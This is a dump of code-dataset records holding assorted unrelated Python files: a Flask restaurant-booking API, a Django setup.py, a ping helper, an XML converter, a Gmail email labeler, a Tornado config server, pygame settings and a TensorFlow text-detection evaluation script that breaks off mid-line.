update_kv_map = {}\n booking_status = \"no_seat\"\n if r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '0':\n booking_status = \"available\"\n elif r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '1':\n booking_status = \"waiting_list\"\n update_kv_map[\"waiting_order\"] = r_obj[\"msg_response\"][\"update\"][\"waiting_order\"]\n update_kv_map[\"restaurant_id\"] = r_obj[\"msg_response\"][\"update\"][\"restaurant_id\"]\n update_kv_map[\"booking_status\"] = booking_status\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass BookRestaurant(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n date = json_from_request['task_info']['time_date']\n time = json_from_request['task_info']['time_time']\n restaurant_id = json_from_request['task_info']['restaurant_id']\n seat_num_total = json_from_request['task_info']['seat_num_total']\n lastname = json_from_request['task_info']['lastname']\n phone = json_from_request['task_info']['phone']\n \n # request\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"date\": date,\n \"time\": time,\n \"restaurant_id\": restaurant_id,\n \"seat_num\": seat_num_total,\n \"lastname\": lastname,\n \"phone\": phone\n }\n }\n r = requests.post(constants.SYSTEX_URL+'booking/doBooking', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n \n # response\n update_kv_map = {}\n booking_status = \"no_seat\"\n if r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '0':\n booking_status = \"available\"\n elif r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '1':\n booking_status = \"waiting_list\"\n update_kv_map[\"waiting_order\"] = r_obj[\"msg_response\"][\"update\"][\"waiting_order\"]\n update_kv_map[\"restaurant_id\"] = r_obj[\"msg_response\"][\"update\"][\"restaurant_id\"]\n update_kv_map[\"booking_status\"] = booking_status\n update_kv_map[\"booking_id\"] = r_obj[\"msg_response\"][\"update\"][\"id\"]\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ResetParams(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ResetParams, data received from TE: %s' % json.dumps(json_from_request, ensure_ascii=False, indent=4))\n\n task_info = json_from_request['task_info']\n LOG.info(json.dumps(task_info, ensure_ascii=False))\n remove_kv_map = {}\n if 'seat_num' not in task_info:\n remove_kv_map[\"seat_num_children\"] = None\n if 'phone' not in task_info:\n remove_kv_map[\"phone\"] = None\n if 'lastname' not in task_info:\n remove_kv_map[\"lastname\"] = None\n if 'time_str' not in task_info:\n remove_kv_map[\"exact_date\"] = None\n remove_kv_map[\"exact_hour\"] = None\n remove_kv_map[\"exact_minute\"] = None\n ret = encapsule_rtn_format(None, remove_kv_map)\n return Response(json.dumps(ret), status=200)\n \n","sub_path":"book_restaurant/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":32007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91516286","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport django_social_launch\n\npackage_name = 'django_social_launch'\ntest_package_name = '%s_test_project' % package_name\n\nEXCLUDE_FROM_PACKAGES = ['%s*' % test_package_name]\n\ndef runtests():\n import os\n import sys\n \n import django\n from django.core.management import call_command\n \n os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % test_package_name\n django.setup()\n call_command('test')\n sys.exit()\n\nsetup(name='django-social-launch',\n version=django_social_launch.__version__,\n description=\"Social sign up page for Django.\",\n author='Seán Hayes',\n author_email='sean@seanhayes.name',\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Framework :: Django\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Internet :: WWW/HTTP :: Site Management\",\n \"Topic :: Software Development :: Libraries\",\n \"Topic :: Software Development :: Libraries :: Python Modules\"\n ],\n keywords='django social sign up referrer',\n url='http://seanhayes.name/',\n download_url='https://github.com/SeanHayes/django-social-launch',\n license='GPL',\n packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),\n include_package_data=True,\n install_requires=['Django>=1.7', 'python-social-auth',],\n test_suite='setup.runtests',\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360995564","text":"\r\n\r\nimport os\r\ndef isup(ip):\r\n if os.system(f\"ping {ip} > NUL\") == 0:\r\n status = True\r\n else:\r\n status = False\r\n return status\r\n\r\n\r\n\r\nimport subprocess\r\n\r\ndef isup1(ip):\r\n exitcode=subprocess.call([\"ping\",\"-n\",\"1\",ip],stdout=subprocess.PIPE)\r\n if exitcode == 0:\r\n status = True\r\n else:\r\n status = False\r\n return status\r\n\r\ndef isup2(ip):\r\n return not subprocess.call([\"ping\",\"-n\",\"1\",ip],stdout=subprocess.PIPE)\r\n \r\n","sub_path":"mymodule.py","file_name":"mymodule.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42170836","text":"\nfrom lxml import etree\ndata = {}\nlist_data = []\n\nwith open('./xml_file.xml', 'rb') as xmlf:\n tree = etree.parse(xmlf)\n root = tree.getroot()\n for i in root:\n children = i.getchildren()\n for a in i:\n data[a.tag] = a.text\n list_data.append(data)\n\nfor item in list_data:\n for i in item:\n print(str(i) + ' ' + str(item[i]))\n print('-----------------------')\n\nwith open('./out_xml.xml', 'wb') as xmlout:\n root = etree.Element('books')\n for book in list_data:\n element = etree.SubElement(root, 'book')\n for key, value in book.items():\n child = etree.SubElement(element, key)\n child.text = value\n et = etree.ElementTree(root)\n et.write(xmlout, xml_declaration=True, encoding='utf-8', pretty_print=True)\n\n\n\n\n","sub_path":"studying/xml_reader/main_xml_reader.py","file_name":"main_xml_reader.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627163729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 16:35:07 2021\n\n@author: neo\n\"\"\"\n\nimport argparse\nfrom simplegmail import Gmail\nfrom simplegmail.query import construct_query\n\nimport _pickle as cPickle\n\n# parsing arguments --------------------------------------------------------------------\n\nparser = argparse.ArgumentParser(description='Email Labeler')\nparser.add_argument(\"--older\", default = 1, help = \"emails other than the supplied number of days are scanned (default is 1)\")\nparser.add_argument(\"--newer\", default = 120, help = \"emails newer than the supplied number of days are scanned (default is 90)\")\nparser.add_argument(\"--cred\", default = \"credentials.json\", help = \"name of the gmail credentials file (default is 'credentials.json')\")\nparser.add_argument(\"--label\", default = \"applications\", help = \"emails recognized as application receipts are categorized under this label in gmail\")\nargs = parser.parse_args()\n\n# print(args)\n\n# user-defined variables ----------------------------------------------------------------\n\nlabel_name = args.label\nemails_older_than = args.older # days\nemails_newer_than = args.newer #days\ncredentials_file = args.cred\n\n#----------------------------------------------------------------------------------------\n\n# initiate gmail API\ngmail = Gmail(client_secret_file = \"gmail_credentials/\" + credentials_file)\n\n\n# get all labels in your gmail account \n\nlabels = gmail.list_labels()\n\n\napplication_label = list(filter(lambda x: x.name == label_name, labels))[0]\n\n\n# sample query ---------------\n\n# query_params = {\n# \"newer_than\": (2, \"day\"),\n# \"unread\": True,\n# \"labels\":[[\"Work\"], [\"Homework\", \"CS\"]]\n# }\n\n# query to find emails\nquery_params = {\n \"older_than\": (emails_older_than, \"day\"),\n \"newer_than\": (emails_newer_than, \"day\")\n}\n\n# get emails matching the query\nmessages = gmail.get_messages(query=construct_query(query_params))\n\nprint(\"Messages Collected...........................................\")\n\n\npath = \"pickles/\"\n\n# loading vectorizer and feature selector\nvectorizer_file = path + \"vectorizer.pkl\"\nvectorizer_file_handler = open(vectorizer_file, \"rb\")\nvectorizer = cPickle.load(vectorizer_file_handler)\nvectorizer_file_handler.close()\n\nselector_file = path + \"selector.pkl\"\nselector_file_handler = open(selector_file, \"rb\")\nselector = cPickle.load(selector_file_handler)\nselector_file_handler.close()\n\n# load classifier\nclassifier_file = path + \"classifier.pkl\"\nclf_file_handler = open(classifier_file, \"rb\")\nclf = cPickle.load(clf_file_handler)\nclf_file_handler.close()\n\nfor m in messages:\n sub = ''.join(e for e in m.subject if e.isalnum() or e == ' ' and e != '-')\n features_test_transformed = vectorizer.transform([sub])\n features_test = selector.transform(features_test_transformed).toarray()\n pred = clf.predict(features_test)\n \n if pred[0] == 1:\n # print(clf.predict_proba(features_test))\n m.add_label(application_label)\n \nprint(\"Labelling complete...........................................\")\n\nexit()\n \n \n\n\n\n\n\n","sub_path":"labeler.py","file_name":"labeler.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69979873","text":"from tornado import template\nimport tornado.ioloop\nimport tornado.web\nimport json\nfrom datetime import datetime\n\n\nclass MyFormHandler(tornado.web.RequestHandler):\n \n def get(self, loc):\n if loc == 'gui':\n self.render(\"base.html\", message=None)\n else:\n config_file = open('config.json')\n res = json.loads(config_file.read())\n config_file.close()\n self.write(res)\n \n def post(self, loc):\n text = self.get_body_argument(\"config\")\n with open('config.json', 'w') as outfile:\n json.dump(text, outfile)\n now = datetime.now()\n self.render(\"base.html\",\n message=\"Updated at {}\".format(now.strftime(\"%H:%M:%S\")))\n\n\nif __name__ == \"__main__\":\n application = tornado.web.Application([\n (r\"/(esp32)\", MyFormHandler),\n (r\"/(gui)\", MyFormHandler),\n (r\"/(.*)\", tornado.web.StaticFileHandler, {'path': '.',\n 'default_filename': 'config.json'}),\n ], autoreload=True, static_hash_cache=False)\n application.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n\n","sub_path":"GUI/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"580076267","text":"#To find the largest and smallest element in an array\r\ndef large_small(arr):\r\n large=arr[0]\r\n small=arr[0]\r\n for i in range(len(arr)):\r\n if arr[i]>large:\r\n large=arr[i]\r\n elif arr[i]<small:\r\n small=arr[i]\r\n print(\"largest element is\", large)\r\n print(\"smallest element is\", small)\r\n \r\narr=[34,76,90,89,56,98]\r\nlarge_small(arr)\r\n\r\n","sub_path":"large_min.py","file_name":"large_min.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207589592","text":"\n# Python's built in logging\nimport logging\n\n\n# Module attributes\nconsole_logging_enabled = True\nconsole_log_level = logging.INFO\nfile_logging_enabled = True\nfile_log_level = logging.DEBUG\nfile_name = 'pysf.log'\n\n\n\n# Create a base class\nclass LoggingHandler:\n \"\"\"The summary line for a class docstring should fit on one line.\n\n If the class has public attributes, they may be documented here\n in an ``Attributes`` section and follow the same formatting as a\n function's ``Args`` section. Alternatively, attributes may be documented\n inline with the attribute's declaration (see __init__ method below).\n\n Properties created with the ``@property`` decorator should be documented\n in the property's getter method.\n\n Attributes:\n attr1 (str): Description of `attr1`.\n attr2 (:obj:`int`, optional): Description of `attr2`.\n\n \"\"\" \n def __init__(self, *args, **kwargs):\n # Set up logger with the default level of DEBUG, to let everything through.\n self.initLogger()\n \n def initLogger(self, loggerLevel=logging.DEBUG):\n # This gets the class name for the logger: \n # https://stackoverflow.com/questions/7385037/how-do-i-get-the-name-of-the-class-containing-a-logging-call-in-python\n logger = logging.getLogger(self.__class__.__name__)\n logger.setLevel(loggerLevel)\n logger.handlers = []\n\n if (console_logging_enabled):\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n consoleHandler.setLevel(console_log_level)\n logger.addHandler(consoleHandler)\n \n if (file_logging_enabled):\n fileHandler = logging.FileHandler(file_name) # appends by default\n fileHandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n fileHandler.setLevel(file_log_level)\n logger.addHandler(fileHandler)\n \n self.log = logger\n \n def debug(self, *args, **kwargs):\n self.log.debug(*args, **kwargs)\n \n def info(self, *args, **kwargs):\n self.log.info(*args, **kwargs)\n \n def warning(self, *args, **kwargs):\n self.log.warning(*args, **kwargs)\n \n def error(self, *args, **kwargs):\n self.log.error(*args, **kwargs)\n \n \n# Does nothing special, we're just extending LoggingHandler so we have an \n# obvious class name (\"GlobalLogger\") to tie global logging statements to.\nclass GlobalLogger(LoggingHandler):\n def __init__(self):\n super(GlobalLogger, self).__init__()\n \n \n \n# (Where in other languages we would use a singleton object for this,\n# the Pythonic way is to use a module-bound variable)\nglobal_logger = GlobalLogger()\n\n\n ","sub_path":"pysf/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430486170","text":"import pygame as pg\n\nvec = pg.math.Vector2\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nBROWN = (106, 55, 5)\nCYAN = (0, 255, 255)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"Tilemap Demo\"\nBGCOLOR = BROWN\n\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n# Player settings\nPLAYER_HEALTH = 100\nPLAYER_SPEED = 300\nPLAYER_IMG = 'manBlue_gun.png'\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\n# KICKBACK = 200\n\nWALL_IMG = 'tileGreen_39.png'\n\nMOB_IMG = 'zombie1_hold.png'\nMOB_SPEEDS = [150, 100, 75, 125]\nMOB_HEALTH = 100\nMOB_HIT_RECT = pg.Rect(0, 0, 30, 30)\nMOB_DAMAGE = 10\nMOB_KNOCKBACK = 20\nAVOID_RADIUS = 50\nDETECT_RADIUS = 400\nSPLAT = 'splat green.png'\nFLASH_DURATION = 50\nDAMAGE_ALPHA = [i for i in range(0, 255, 55)]\nNIGHT_COLOR = (20, 20, 20)\nLIGHT_RADIUS = (600, 600)\nLIGHT_MASK = \"light_350_med.png\"\n\nBULLET_IMG = 'bullet.png'\nWEAPONS = {}\nWEAPONS['pistol'] = {'bullet_speed': 500,\n 'bullet_lifetime': 1000, # 一秒后消失\n 'rate': 250,\n 'kickback': 200,\n 'spread': 5,\n 'damage': 10,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\nWEAPONS['shotgun'] = {'bullet_speed': 400,\n 'bullet_lifetime': 500,\n 'rate': 900,\n 'kickback': 300,\n 'spread': 20,\n 'damage': 5,\n 'bullet_size': 'sm',\n 'bullet_count': 12}\nBARREL_OFFSET = vec(30, 10)\n\nMUZZLE_FLASHES = ['whitePuff15.png', 'whitePuff16.png', 'whitePuff17.png', 'whitePuff18.png', ]\n\nWALL_LAYER = 1\nPLAYER_LAYER = 2\nBULLET_LAYER = 3\nMOB_LAYER = 2\nEFFECTS_LAYER = 4\nITEMS_LAYER = 1\n\nITEM_IMAGES = {'health': 'health_pack.png', 'shotgun': 'obj_shotgun.png'}\nHEALTH_PACK_AMOUNT = 20\nBOB_RANGE = 10\nBOB_SPEED = 0.3\n\n# Sounds\nBG_MUSIC = 'espionage.ogg'\nPLAYER_HIT_SOUNDS = ['pain/8.wav', 'pain/9.wav', 'pain/10.wav', 'pain/11.wav']\nZOMBIE_MOAN_SOUNDS = ['brains2.wav', 'brains3.wav', 'zombie-roar-1.wav', 'zombie-roar-2.wav',\n 'zombie-roar-3.wav', 'zombie-roar-5.wav', 'zombie-roar-6.wav', 'zombie-roar-7.wav']\nZOMBIE_HIT_SOUNDS = ['splat-15.wav']\nWEAPON_SOUNDS = {'pistol': ['pistol.wav'],\n 'shotgun': ['shotgun.wav']}\nEFFECTS_SOUNDS = {'level_start': 'level_start.wav',\n 'health_up': 'health_pack.wav',\n 'gun_pickup': 'gun_pickup.wav'}\n","sub_path":"Tilemap/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"148193110","text":"import turtle\n\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Square\")\n\nmyPen = turtle.Turtle()\nmyPen.speed(2)\nmyPen.color(\"green\")\n\nfor i in range(4):\n myPen.forward(100)\n myPen.left(90)\n\nturtle.done()","sub_path":"Vong lap for_Ve hinh vuong.py","file_name":"Vong lap for_Ve hinh vuong.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103749957","text":"import os\nimport logging\n\nfrom apistellar import SoloManager\n\napp_name = \"blog\"\n\n\ndef run():\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)d %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S'\n )\n SoloManager(\n app_name, current_dir=os.path.dirname(os.path.abspath(__file__))).start()\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"blog/solo_app.py","file_name":"solo_app.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195805889","text":"import math\nimport time\n\nimport numpy as np\nimport tensorflow as tf\nimport tf_extended as tfe\nimport os, os.path\nimport sys\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))\nimport load_batch\nfrom nets import nets_factory\nslim = tf.contrib.slim\n\n# =========================================================================== #\n# Some default EVAL parameters\n# =========================================================================== #\n# List of recalls values at which precision is evaluated.\nLIST_RECALLS = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.85,\n\t\t\t\t0.90, 0.95, 0.96, 0.97, 0.98, 0.99]\nDATA_FORMAT = 'NCHW'\n\n# =========================================================================== #\n# SSD evaluation Flags.\n# =========================================================================== #\ntf.app.flags.DEFINE_float(\n\t'select_threshold', 0.1, 'Selection threshold.')\ntf.app.flags.DEFINE_integer(\n\t'select_top_k', 400, 'Select top-k detected bounding boxes.')\ntf.app.flags.DEFINE_integer(\n\t'keep_top_k', 200, 'Keep top-k detected objects.')\ntf.app.flags.DEFINE_float(\n\t'nms_threshold', 0.45, 'Non-Maximum Selection threshold.')\ntf.app.flags.DEFINE_float(\n\t'matching_threshold', 0.5, 'Matching threshold with groundtruth objects.')\ntf.app.flags.DEFINE_integer(\n\t'eval_resize', 4, 'Image resizing: None / CENTRAL_CROP / PAD_AND_RESIZE / WARP_RESIZE.')\ntf.app.flags.DEFINE_integer(\n\t'eval_image_size', None, 'Eval image size.')\ntf.app.flags.DEFINE_boolean(\n\t'remove_difficult', True, 'Remove difficult objects from evaluation.')\ntf.app.flags.DEFINE_integer(\n\t'num_samples', 229, 'number of dataset size')\ntf.app.flags.DEFINE_string(\n 'model_name', 'text_box_300', 'The name of the architecture to evaluate.')\n\n\n# =========================================================================== #\n# Main evaluation flags.\n# =========================================================================== #\ntf.app.flags.DEFINE_integer(\n\t'num_classes', 2, 'Number of classes to use in the dataset.')\ntf.app.flags.DEFINE_integer(\n\t'batch_size', 1, 'The number of samples in each batch.')\ntf.app.flags.DEFINE_integer(\n\t'max_num_batches', None,\n\t'Max number of batches to evaluate by default use all.')\ntf.app.flags.DEFINE_string(\n\t'master', '', 'The address of the TensorFlow master to use.')\ntf.app.flags.DEFINE_string(\n\t'checkpoint_path', './checkpoints/model.ckpt-33763',\n\t'The directory where the model was written to or an absolute path to a '\n\t'checkpoint file.')\ntf.app.flags.DEFINE_string(\n\t'eval_dir', './data/eval/', 'Directory where the results are saved to.')\ntf.app.flags.DEFINE_integer(\n\t'num_readers', 4,\n\t'The number of parallel readers that read data from the dataset.')\ntf.app.flags.DEFINE_integer(\n\t'num_preprocessing_threads', 4,\n\t'The number of threads used to create the batches.')\ntf.app.flags.DEFINE_string(\n\t'dataset_dir', None, 'The directory where the dataset files are stored.')\ntf.app.flags.DEFINE_float(\n\t'moving_average_decay', None,\n\t'The decay to use for the moving average.'\n\t'If left as None, then moving averages are not used.')\ntf.app.flags.DEFINE_float(\n\t'gpu_memory_fraction', 0.08, 'GPU memory fraction to use.')\ntf.app.flags.DEFINE_string(\n\t'gpu_eval', '/cpu:0',\n\t'Which gpu to use')\ntf.app.flags.DEFINE_boolean(\n\t'wait_for_checkpoints', False, 'Wait for new checkpoints in the eval loop.')\ntf.app.flags.DEFINE_integer('shuffle_data', False,\n\t\t\t\t\t\t\t'Wheather shuffe the datasets')\ntf.app.flags.DEFINE_boolean(\n\t'use_batch', True,\n\t'Wheather use batch_norm or not')\ntf.app.flags.DEFINE_boolean(\n\t'use_whiten', True,\n\t'Wheather use whiten or not,genally you can choose whiten or batchnorm tech.')\n\n\nFLAGS = tf.app.flags.FLAGS\n\n\ndef main(_):\n\tif not FLAGS.dataset_dir:\n\t\traise ValueError('You must supply the dataset directory with --dataset_dir')\n\n\ttf.logging.set_verbosity(tf.logging.INFO)\n\twith tf.Graph().as_default():\n\t\ttf_global_step = slim.get_or_create_global_step()\n\n\t\t# initalize the net\n\t\tnetwork_fn = nets_factory.get_network(FLAGS.model_name)\n\t\tnet = network_fn()\n\t\tout_shape = net.params.img_shape\n\t\tout_shape = (300,300)\n\t\tanchors = net.anchors(out_shape)\n\t\t# =================================================================== #\n\t\t# Create a dataset provider and batches.\n\t\t# =================================================================== #\n\t\twith tf.device('/cpu:0'):\n\t\t\tb_image, glabels, b_gbboxes, g_bbox_img, b_glocalisations, b_gscores =\\\n\t\t\t\t\t\t\tload_batch.get_batch(FLAGS.dataset_dir,\n\t\t\t\t\t\t\t\t\t\t FLAGS.num_readers,\n\t\t\t\t\t\t\t\t\t\t FLAGS.batch_size,\n\t\t\t\t\t\t\t\t\t\t out_shape,\n\t\t\t\t\t\t\t\t\t\t net,\n\t\t\t\t\t\t\t\t\t\t anchors,\n\t\t\t\t\t\t\t\t\t\t FLAGS,\n\t\t\t\t\t\t\t\t\t\t file_pattern = '*.tfrecord',\n\t\t\t\t\t\t\t\t\t\t is_training = False,\n\t\t\t\t\t\t\t\t\t\t shuffe = FLAGS.shuffle_data)\n\t\tb_gdifficults = tf.zeros(tf.shape(glabels), dtype=tf.int64)\n\t\tdict_metrics = {}\n\t\targ_scope = net.arg_scope(data_format=DATA_FORMAT)\n\t\twith slim.arg_scope(arg_scope):\n\t\t\tlocalisations, logits, end_points = \\\n\t\t\t\tnet.net(b_image, is_training=False, use_batch=FLAGS.use_batch)\n\t\t# Add losses functions.\n\t\t#total_loss = net.losses(logits, localisations,\n\t\t#\t\t\t\t\t b_glocalisations, b_gscores)\n\t\tpredictions = []\n\t\tfor i in range(len(logits)):\n\t\t\tpredictions.append(slim.softmax(logits[i]))\n\t\t\n\t\t# Performing post-processing on CPU: loop-intensive, usually more efficient.\n\t\twith tf.device('/device:CPU:0'):\n\t\t\t# Detected objects from SSD output.\n\t\t\tlocalisations = net.bboxes_decode(localisations, anchors)\n\t\t\trscores, rbboxes = \\\n\t\t\t\tnet.detected_bboxes(predictions, localisations,\n\t\t\t\t\t\t\t\t\t\tselect_threshold=FLAGS.select_threshold,\n\t\t\t\t\t\t\t\t\t\tnms_threshold=FLAGS.nms_threshold,\n\t\t\t\t\t\t\t\t\t\tclipping_bbox=None,\n\t\t\t\t\t\t\t\t\t\ttop_k=FLAGS.select_top_k,\n\t\t\t\t\t\t\t\t\t\tkeep_top_k=FLAGS.keep_top_k)\n\t\t\t# Compute TP and FP statistics.\n\t\t\tnum_gbboxes, tp, fp, rscores = \\\n\t\t\t\ttfe.bboxes_matching_batch(rscores.keys(), rscores, rbboxes,\n\t\t\t\t\t\t\t\t\t\t glabels, b_gbboxes, b_gdifficults,\n\t\t\t\t\t\t\t\t\t\t matching_threshold=FLAGS.matching_threshold)\n\n\t\t# Variables to restore: moving avg. or normal weights.\n\t\tif FLAGS.moving_average_decay:\n\t\t\tvariable_averages = tf.train.ExponentialMovingAverage(\n\t\t\t\tFLAGS.moving_average_decay, tf_global_step)\n\t\t\tvariables_to_restore = variable_averages.variables_to_restore(\n\t\t\t\tslim.get_model_variables())\n\t\t\tvariables_to_restore[tf_global_step.op.name] = tf_global_step\n\t\telse:\n\t\t\tvariables_to_restore = slim.get_variables_to_restore()\n\n\t\t# =================================================================== #\n\t\t# Evaluation metrics.\n\t\t# =================================================================== #\n\t\twith tf.device(FLAGS.gpu_eval):\n\t\t\tdict_metrics = {}\n\t\t\t# Extra losses as well.\n\t\t\tfor loss in tf.get_collection('EXTRA_LOSSES'):\n\t\t\t\tdict_metrics[loss.op.name] = slim.metrics.streaming_mean(loss)\n\n\t\t\t# Add metrics to summaries and Print on screen.\n\t\t\tfor name, metric in dict_metrics.items():\n\t\t\t\t# summary_name = 'eval/%s' % name\n\t\t\t\tsummary_name = name\n\t\t\t\top = tf.summary.scalar(summary_name, metric[0], collections=[])\n\t\t\t\t# op = tf.Print(op, [metric[0]], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t# FP and TP metrics.\n\t\t\ttp_fp_metric = tfe.streaming_tp_fp_arrays(num_gbboxes, tp, fp, rscores)\n\t\t\tfor c in tp_fp_metric[0].keys():\n\t\t\t\tdict_metrics['tp_fp_%s' % c] = (tp_fp_metric[0][c],\n\t\t\t\t\t\t\t\t\t\t\t\ttp_fp_metric[1][c])\n\n\t\t\t# Add to summaries precision/recall values.\n\t\t\ticdar2013 = {}\n\t\t\tfor c in tp_fp_metric[0].keys():\n\t\t\t\t# Precison and recall values.\n\t\t\t\tprec, rec = tfe.precision_recall(*tp_fp_metric[0][c])\n\n\t\t\t\top = tf.summary.scalar('precision', tf.reduce_mean(prec), collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t\top = tf.summary.scalar('recall', tf.reduce_mean(rec), collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t\t# Average precision VOC07.\n\t\t\t\tv = tfe.average_precision_voc12(prec, rec)\t\t\t\t\n\t\t\t\t#v = (prec + rec)/2.\n\t\t\t\tsummary_name = 'ICDAR13/%s' % c\n\t\t\t\top = tf.summary.scalar(summary_name, v, collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\t\t\t\ticdar2013[c] = v\n\n\n\t\t\t# Mean average precision VOC07.\n\t\t\tsummary_name = 'ICDAR13/mAP'\n\t\t\tmAP = tf.add_n(list(icdar2013.values())) / len(icdar2013)\n\t\t\top = tf.summary.scalar(summary_name, mAP, collections=[])\n\t\t\top = tf.Print(op, [mAP], summary_name)\n\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\n\t\t# Split into values and updates ops.\n\t\tnames_to_values, names_to_updates = slim.metrics.aggregate_metric_map(dict_metrics)\n\n\t\t# =================================================================== #\n\t\t# Evaluation loop.\n\t\t# =================================================================== #\n\t\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n\t\tconfig = tf.ConfigProto(log_device_placement=False, gpu_options=gpu_options)\n\t\t# config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n\n\t\t# Number of batches...\n\t\tif FLAGS.max_num_batches:\n\t\t\tnum_batches = FLAGS.max_num_batches\n\t\telse:\n\t\t\tnum_batches = math.ceil(FLAGS.num_samples / float(FLAGS.batch_size))\n\n\t\tif not FLAGS.wait_for_checkpoints:\n\t\t\tif tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n\t\t\t\tcheckpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n\t\t\telse:\n\t\t\t\tcheckpoint_path = FLAGS.checkpoint_path\n\t\t\ttf.logging.info('Evaluating %s' % checkpoint_path)\n\n\t\t\t# Standard evaluation loop.\n\t\t\tstart = time.time()\n\t\t\tslim.evaluation.evaluate_once(\n\t\t\t\tmaster=FLAGS.master,\n\t\t\t\tcheckpoint_path=checkpoint_path,\n\t\t\t\tlogdir=FLAGS.eval_dir,\n\t\t\t\tnum_evals=num_batches,\n\t\t\t\teval_op=list(names_to_updates.values()),\n\t\t\t\tvariables_to_restore=variables_to_restore,\n\t\t\t\tsession_config=config)\n\t\t\t# Log time spent.\n\t\t\telapsed = time.time()\n\t\t\telapsed = elapsed - start\n\t\t\tprint('Time spent : %.3f seconds.' % elapsed)\n\t\t\tprint('Time spent per BATCH: %.3f seconds.' % (elapsed / num_batches))\n\n\t\telse:\n\t\t\tcheckpoint_path = 